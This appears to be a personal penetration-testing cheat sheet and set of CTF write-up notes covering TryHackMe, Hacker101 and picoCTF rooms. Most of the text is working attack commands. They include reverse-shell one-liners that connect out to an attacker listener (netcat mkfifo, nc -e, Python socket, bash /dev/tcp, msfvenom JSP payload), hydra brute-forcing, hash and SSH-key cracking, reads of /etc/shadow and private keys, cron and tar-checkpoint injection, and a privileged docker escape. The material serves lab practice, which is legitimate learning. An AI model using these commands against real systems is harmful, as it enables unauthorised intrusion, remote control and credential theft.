🚩 A collection of notes, commands, & links to help w/ hacking & cybersec. Work in progress, please be patient while it’s updated.
CyberChef // GTFOBins // HackTricks // RevShells // PayloadsAllTheThings
🔥 Kill Chain
General
CTRL + SHIFT + UP|DOWN
# scrollCTRL + SHIFT C|V
# Copy|Pastenl
# cat w/ line numssed
# stream editorip=
# set alias env varecho $ip
# test alias
Recon/Enumeration
rustscan
rustscan -a $ip -g
rustscan -a $ip -p $ports -- -sC -sV | tee scan.init
nmap
nmap -vv -Pn $ip
nmap -vv -Pn -p $ports -A $ip
feroxbuster
feroxbuster -u http://$ipa -w $wordlist | tee fuzz.init
FFUF
ffuf -u http://$ip/FUZZ -w $wordlist | tee fuzz.init
firefox
- Analysis: Whatruns, Wappalyzer
/robots.txt
,sitemap(.xml)
smb
enum4linux $ipa | tee enum4.txt
# smb shares
Exploitation
- searchsploit ^
searchsploit -m $number $location
# Copysearchsploit -w $term
# Website
Shells - Reverse
nc (netcat)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ip $port >/tmp/f
nc -e /bin/bash $ip $port
Linux Enumeration
ls -la /home
cat /etc/passwd
cat /etc/crontab
sudo -l
# run sudo with?find / —perm 4000 2>/dev/null
# find suidsfind / -user $user 2>/dev/null
# find user filesfind / -name *id_rsa* 2>/dev/null
# find files that match id_rsa
python -c "import pty; pty.spawn('/bin/bash')"
python3 -c "import pty; pty.spawn('/bin/bash')"
/bin/sh -i
[CTRL+Z]
stty raw -ech;fg
export TERM=xterm
- pspy 🔗
Forensics
- strings
- exiftool
- binwalk
- pdfinfo
Hashes
hashid
namethathhash (nth)
Git
git add . && git commit -m “$comment” && git push
- Generate token, use as password.
Repos
Windows
cmd.exe
dir
# list contentscd
# change dirtype
# cat file contentstype $file | clip
# copy to clipboard
📝 Notes
🐀 Broad Scope Bug Bounties From Scratch - XSS Rat
Bug bounty != Pentesting, it’s testing targets with skillset.
Platforms: public(Intigriti, HackerOne, Bugcrowd), private.
Target: B2B|B2C, Wide Scope|Main App, Web|Mobile|Desktop|IP|IOT, VDP|Paid, Public|Private.
- Avoid: high payout|banks (hardened), newspapers (paywall), mobile|webshops, no creds.
Invites: be active, report, ctfs (lower qual).
Subdomains:
httprobe
^ finds working http(s).- Flyover: Aquatone,
Computing Fundamentals - Roppers Academy
Computer Science 50 Python (CS50P)
Automate The Boring Stuff with Python
✍ Writeups
- Getting started: inspect > comment
- Attack on EU: doc > “Types of Internet Banking Attacks”
- Pharming: search ^ ^ ^
- Phising hacker: search ^
- Securing External Link: search ^
- Linux folder: search ^
💻 Hacker101
A little something to get you started
- Browser > inspect >
/background.png
- Browser > inspect >
Micro-CMS v1
Postbook
Flag0
- user:password
Flag1
- My profile >
?page=profile.php&id=d
# change d to b or c
Flag2
- new post > inspect > form
<input type="hidden" name="user_id" value="$ANYTHING">
Flag3
- 189 * 5 = 945
- post > change
&id=945
Flag4
page=view.php&id=945
>page=edit.php&id=945
Flag5
- Browser > inspect > application > cookie id:$string
nth $string
= md5echo $string > $file
john --format=Raw-MD5 --wordlist=rockyou.txt $file
echo -n '1' | md5sum
- Browser > inspect > application > cookie id:$md5hash
Flag6
- Login > user:password
echo -n '1' | md5sum
?delete=$md5hash
Petshop Pro
Flag0
- Burp > /checkout > Repeater > Inspector “Request Body Paramaters”
- Change price of image to $0.00
Flag1 - NOT WORKING
- hydra -L $xato-net-10-million-usernames -p password $domain|ip http-post-form “/login/:username=^USER^&password=^PASS^:Invalid username” -o pass.txt -v
🗃 Kase Scenarios
🐍 Betrayal
People
Scene of the Crime
- Alarm System: Toward Kitchen P*******n O
- Computers: Office x3
- Password: ^ ^ ^ - s*ar
- Stairs: ruler > top > bottom 1*
Late Night Escape Challenges
- Google Lens > ^ > C******* C*******
- Guess > F*******
- Profile > ^ > URL:1374270*3
wget $jpg
>exiftool $jpg
> Date/Time Original > 2*:1*- Life Insurance:
wget $zip
>open $pdf
> $*,000,000.00 - C*e and Rt
Online Troll
- YouTube > Facebook > R****
🌊 Dark Waters | Writeup Part 1, Part 2
People
- P - author of letter, hand written, “test the water”
- Lisa - young, bar owner, offered room. some event.
- Protestor - biology student @Penn State York, was watched/harrased, claims GRPC,
- William Heathcote - great-gf 1837 had issues w/ GRPC.
- GRPC - local paper co, holding event, 4 employees (Patti), hosting 100th ann,
- Alexander Ross - politiain, linked to GRPC.
Location
- Glen Rock, Pennsylvania
Unknown Email: [email protected]
r/g****************e ^
Arkg sylbire: Ynxr Zneohet (ROT13)
- Next flyover: Le M***g
🚩 ******************n00bzctf 2023 | YouTube Writeup
Forensics
Crack & Crack:
Avengers ^
Misc
Sanity: /rules > inspect >
<!-- ****** -->
ASL: this + notepad
Google Form 1: inspect >
CTRL + F
“n00bz”My Chemical Romance: this > 186808155710 > 18 68 08 15 57 10 > Ar Er O P La Ne > {aeroplane}
OSINT
Mission Moon
Pwn
Flag Shop: 2 > 1124151235124512 (large number)
Rev
- welcome
strings $file
- welcome
Web
Club_N00b: $site >
/check?secret_phrase=radical
Robots: $site >
/robots.txt
Secret Group: Burp Repeater > change headers user-agent, connection etc.
Conditions: Burp Repeater > username=ᾉᾉᾉᾉᾉᾉᾉᾉᾉᾉᾉᾉᾉ ^
🎓 PicoCTF
Cryptography
Mod 26: CyberChef (ROT13)
Mind your Ps and Qs: rsactftool ^
Forensics
information: exiftool $file, CyberChef (From Base64)
Matryoshka doll: binwalk $file, unzip cd x4, cat $file
Glory of the Garden: xxd $file *see end
Enhance!: subl $file *manually extracted
General Skills
runme.py: python $file
Serpentine: move print_flag(), python $file
First Find: wget $link, unzip $file, cat $pathToFile
Big Zip: grep -r pico $dir
Based: CyberChef
plumbing: nc $domain $port > file, cat file | grep pico
mus1c: rockstar, CyberChef (From Decimal)
flag_shop: 2,1,3578290,2,2,1
1_wanna_b3_a_r0ck5tar: remove lines
Web
GET aHEAD: Burp > Repeater, HEAD ^
Cookie:
- Burp > Repeater > name=18
- Inspect > Storage > Value 1,2,3,4,etc
Insp3ct0r: Inspect HTML, CSS & JS files for comments.
Scavenger Hunt: Insp3ct0r but
robots.txt
,.htaccess
, &.DS_Store
.More Cookies
- Base64 cookie
where are the robots: /robots.txt
logon: Burp > proxy random login
- Cookie: username=Joe; admin=True; password=
dont-use-client-side: view source > js
It is my Birthday:
Who are you?: Burp > Repeater > Add Headers
login: view-source > /index.js (CyberChef Base64)
☁ TryHackMe | Free $5 Credit
🔐 Anonforce
Writeup: YouTube // Blog
rustscan -a $ip, 21:ftp 22:ssh
ftp $ip, anonymous
user = m*******
get user.txt
- cat ~/user.txt
get /notread/*
gpg2john private.asc > private.hash
john --wordlist=/rockyou.txt private.hash
- x******
gpg -d backup.pgp
nano root.hash
hashcat root.hash rockyou.txt
- h*****
ssh root@$ip
🏘 Attacktive Directory (AttacktiveDirect)
Writeup: YouTube
kerbrute userenum --dc THM-AD -d spookysec.local userlist.txt
🍺 Bounty Hacker
Writeup: YouTube // Blog
rustscan -a $ip -p $ports – -sC -sV
ftp -A $ip ^
hydra -l $user -P l****.txt $ip ssh
sudo -l, tar ^
🦉 c4ptur3th3fl4g (capturetheflag)
Writeup: YouTube // Blog
- leet
- binary
- base32
- base64
- hex
- ROT13
- ROT47
- morse
- decimal
- base64 > morse > binary > ROT47 > decimal
- Audacity > spectrogram view
- steghide –extract -sf
- strings
❄ Coldbox Easy
80:http,4512:ssh http - wordpress - ffuf:/******/ - users:****,****,***** msfconsole -q - setg RHOSTS - use wordpress_ghost_scanner, wordpress_xmlrpc_dos, wordpress_xmlrpc_login, wordpress_pingback_access wpscan --url http://$ip -e vp,vt,u wpscan --url http://$ip --passwords $wordlist - *****:********* - Appearance > Editor > PHP Pentest Monkey Rev Shell # Initial Access www-data cat /var/www/html/wp-config.php - DB_NAME: ******, DB_USER:*****, DB_PASSWORD:************ cat /etc/passwd/ ssh c0ldd@$ip -p 4512 cat user.txt # PrivEsc sudo -l sudo vim, :sh
🚪 Corridor
Writeup: YouTube // Blog
rustscan: 80,http
source: map tags w/ hash dirs > hash.txt
hashcat hash.txt /rockyou.txt
echo -n $number | md5sum
firefox: http://$ip/$md5sum
🔎 Content Discovery
Content: assets (files, vids, imgs…), features + more.
Discovery (methods): manual, automated and OSINT + combination.
Manual: /robots.txt,
favicon | md5sum
^, sitemap.xml, headerscurl $ipa -v
, framework stack via comments, (c) notices or credits.OSINT: GoogleDork(site, inurl, filetype, intitle), wappalyzer, wayback, github, S3 Buckets http(s)://{name}.s3.amazonaws.com.
Automated: fuzzing(dirb, gobust, fuff, ferox).
🛋 Couch
Writeup: YouTube (Coming Soon)
rustscan
Research ^
ssh user:password
cat .bash_history
docker -H 127.0.0.1:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
cat /mnt/root/root.txt
🚩 CTF Collection Volume 1 (ctfcollectionvol1)
Writeup: YouTube // Blog (Coming Soon)
- CyberChef > base64
strings $file
orexiftool
steghide --extract -sf $file
- Inspect (CTRL + SHIFT + C)
zbarimg $file
^strings $file
- CyberChef > Base58
- CyberChef > ROT13 > ROT7
- Inspect (CTRL + SHIFT + C)
xxd -p $file > $newFile
nano $newFile
, replace 2333445f w/ 89504E47 ^- CyberChef > Upload $newFile > From Hex > Render Image
- Google Dork
site:"reddit.com" intext:"THM" intitle:"tryhackme"
nano $file
,beef $file
- XOR Calculator > ASCII (base 256)
binwalk $file
,unzip $file
- stegsolve
zbarimg $file
, https://sclouddownloader.net/- Wayback
- Decode > Automatic > Key = THM
- Dec > Hex > ASCii
- wireshark > filter
http.request.method == “GET”
> Follow HTTP Stream
🕺 Dav
Writeups: Twitter // YouTube // Blog (Coming Soon)
rustscan
- 80
- Apache/2.4.18
feroxbuster
- /webdav
Try: Burpsuite - bruteforce basic http auth
Search - webdav default credentials ^
- w*****:x*****
hashid $hash
Try: MD5(APR) or Apache MD5 ^
hashcat -m 1600 hash.txt $rockyou.txt
cadaver <http://$ip/webdav
> ^- revshell = shell.php
put shell.php
nc -lnvp $port
http://$ip/webdav/shell.php
Upgrade Shell
python3 -c "import pty; pty.spawn('/bin/bash')"
[CTRL+Z]
stty raw -echo;fg
export TERM=xterm
PrivEsc ^
sudo -l
=/bin/cat
cat /etc/shadow
cat /root/root.txt
🥜 Easy Peasy
Writeup: YouTube // Blog
rustscan: 80:http, 6498:ssh, 65524:http
feroxbuster: 80, /hidden/whatever, view-source:base64
65524:viewsource search “flag”
65524/robots.txt ^, view-source:Base62 = $directory
- hashcat -m 6900 $hash $dict
- steghide –extract -sf $img, cat $file.txt, binary cyberchef
- ssh b*****@$ip -p 6498
cat crontab, nano $file > revshell ^, cat $.root.txt
🎮 Gaming Server
Writeup: YouTube // Blog
rustscan -a $ip, 22:ssh, 80:http
feroxbuster: /u*****s/, /s****t/
user = j***, pw = dict.lst
ssh2john $key > $hash
,john $hash dict.lst
l*****n,chmod 600 $key
wget ^, chmod +x $file,
python -m http.server 80
bash build-alpine
mv /mnt/root
🔥 Ignite
Writeup: YouTube // Blog
rustscan
80
- a****:a****
searchsploit Fuel
searchsploit -m 50477
RevShell
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.4.1.107 4242 >/tmp/f
Upgrade Shell
python3 -c "import pty; pty.spawn('/bin/bash')"
[CTRL+Z]
stty raw -echo;fg
export TERM=xterm
cat /fuel/application/config/database.php
su root
🔎 Investigating Windows
Writeup: YouTube // Blog
RDP via Remmina
- cmd >
systeminfo
Get-LocalUser | Select Name,LastLogon
- regedit > HKEY_LOCAL_MACHINE > SOFTWARE > Microsoft > Windows > CurrentVersion > Run
- Computer Management > Groups > Administrator
- Event Viewer > Event ID 4634 ‘Log off’
- Alternative:
net user John
- Alternative:
- C:\TMP
- C:\Windows\System32\drivers\etc
- C:\inetpub\wwwroot
- Firewall > Inbound Rules > 1337
- cmd >
📚 Library
Writeup: YouTube // Blog
rustscan: 22,80=Apache2.4.18
robots.txt
Users - m*******
hydra SSH bruteforce ^
hydra -l m******* -P $rockyou $ip ssh -t 4 -vv
- i********
rm bak.py
nano bak.up
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$ip",$port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")
🏹 Lian Yu
Writeup: YouTube // Blog
rustscan: ftp, ssh, http
feroxbuster x3 big.txt dir-medium.txt
- /island/2100/green_arrow.ticket
- B***58
ftp > mget *
- hexedit $broken.png, fix magic header ^
- stegseek $jpg
ssh $s***e $shado
- sudo -l ^
- sudo pkexec /bin/sh
🎩 Madness
Writeup: YouTube // Blog
rustscan: 22,80
http: view source
- wget $jpg
hexedit $jpg, magic number ^
- http://$ip/$directory?$variable=$number
Burp: intruder, payload 0-99
steghide —extract -sf $image
find / -perm -4000 2>dev/null
📃 MD2PDF
Writeup: YouTube // Blog
rustscan: 5000
gobuster -w /seclists/common.txt = /admin
🎭 Mr Robot (WIP)
Writeup: YouTube // Blog
- rustscan: 80, 443
/robots.txt
: $dicferox -kE -x js php html css etc.
- /wp-login.php
- wpscan –disable-tls-checks
- hydra ^
🏡 Neighbour
Writeup: YouTube // Blog
firefox:
- http://$ip,
CTRL+U
guest:guest - http://$ip/profile.php?user=admin
- http://$ip,
🐱👤 Ninja Skills
Writeup: YouTube // Blog
find / -type f ( -name 8V2L -o -name bny0 -o -name c4ZX -o -name D8B3 -o -name FHl1 -o -name oiMO -o -name PFbD -o -name rmfX -o -name SRSq -o -name uqyw -o -name v2Vb -o -name X1Uy ) 2»/dev/null
🔓 Overpass
Writeup: YouTube // Blog
l****.js > Cookie: SessionToken=statusOrCookie > firefox add cookie
- ssh2john key > hash
- john hash rockyou.txt
- passphrase:j*****3
- ls .o******* > ROT47 ^
- [{“name”:“S*****”,“pass”:“s*******************e”}]
cat /etc/crontab
- nano /etc/hosts > add $localip
- Add revshell to crontab/$file, locally > nc
🥒 Pickle Rick
Writeup: YouTube // Blog
rustscan -a $ip
feroxbuster -x js php html css etc.
- index source: user
- robots.txt: pw
/l****.php
- while read line; do echo $line; done < $file ^
- ls -la /home/
- sudo -l
- sudo cp /root/$file .
👨💻 RootMe
Writeup: YouTube // Blog
rustscan -a $ip -p $ports – -sC -sV
feroxbuster -x js php
- u*******
- p****
Burp > Intruder FUZZ >
.php*
^SUID ^ -
find / -perm /4000
python -c 'print(open("/****/****.txt").read())’
^🔴 Res
Research: [HackTricks](https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis) [^](https://redis.io/docs/data-types/), Webshell [^](https://redis.io/docs/data-types/) redis-cli -h $ip msfconsole -q search redis use scanner/redis/file_upload - set LocalFile $shell - set RemoteFile /var/www/html/ linpeas: xxd, GTFO Bins [^](https://gtfobins.github.io/gtfobins/xxd/) - cat /etc/passwd - copy hash > $file
🤖 Skynet
rust:22,80,445... enum4linux: //$ip/anonymous|m*********n ffuf: /s**********l hydra -l m*********n -P l**1.txt $ip http-post-form "/s**********lsrc/login.php:login_username=^USER^&secretkey=^PASS^:Unknown user or password incorrect." -vV -t 1 smb - m*********n:)**************` - notes/i********t.txt http://$ip/4**************d - ffuf=/a***********r searchsploit -m 2***1 - /alerts/alertConfigField.php?urlConfig=../../../../../../../../../home/m*********n/user.txt - /alerts/alertConfigField.php?urlConfig=http://$ip/shell.php? cat /etc/crontab - /home/m*********n/backups/backup.sh - echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $10.4.38.220 3333 >/tmp/f' > shell.sh - touch --checkpoint-action=exec=sh shell.sh - touch "/var/www/html/--checkpoint=1"
🌶 Startup
21,22,80 M*** /f**** ftp=Anonymous Login shell.php ^ /files/ftp cat /recpie.txt get s********.pcap l*****:c***************** ssh@l***** cat user.txt cd scripts echo '$shell.sh' > /etc/print.sh nc -lvnp $port
🐱 Thompson
Writeup: YouTube // Blog
rustscan
- 8009
- 8080
feroxbuster
/host-manager/
/manager/
t*****:s*****
Upload RevShell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$ip LPORT=$port -f war > reverse.war strings reverse.war | grep jsp # in order to get the name of the file
Upgrade Shell
python3 -c "import pty; pty.spawn('/bin/bash')"
[CTRL+Z]
stty raw -echo;fg
export TERM=xterm
/home/j***/id.sh
nano id.sh
bash -i >& /dev/tcp/$ip/$port 0>&1
🌐 Web Application Security
Writeup: YouTube (Coming Soon)
Web app: app w/out install on remote server e.g. gmail, office on., etsy.
Identify/Auth Fail: bruteforce-attk, weak|clear-text passowrds.
Broken Acc. Control: not least priv (IDOR), mod other users data, access other pages without auth.
Injection: input w/ malious code to trick app.
Crypt Fail: HTTP != HTTPS, weak crypt e.g. ROT13, default keys e.g. 1234.
🐱🐉 WGEL
Writeup: YouTube // Blog
rustscan: 22 ssh, 80 http
firefox: http://$ip, view source
gobuster: /sitemap/, /sitemap/.ssh
ssh j****e:key, chmod 600 key
sudo -l, /usr/bin/wget
- local: python -m http.server, remote: wget http://$ip/linpeas.sh
- chmod +x linpeas.sh
- gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
🐇 Year Of The Rabbit
Writeup: YouTube // Blog
rustscan -a $ip -p $ports – -sC -sV
feroxbuster
/a****s/ > css comment
burp > repeater > header
/W*********U
wget $png > binwalk > binwalk -e | strings $png
copy/paste passwords >
hydra -l f****** -P $file $ip ftp
ftp -A $ip > get $file.txt > beef $file.txt
find / -name s3cr3t 2>/dev/null, su g*********e
sudo -u#-1 /usr/bin/vi /home/g*********e/user.txt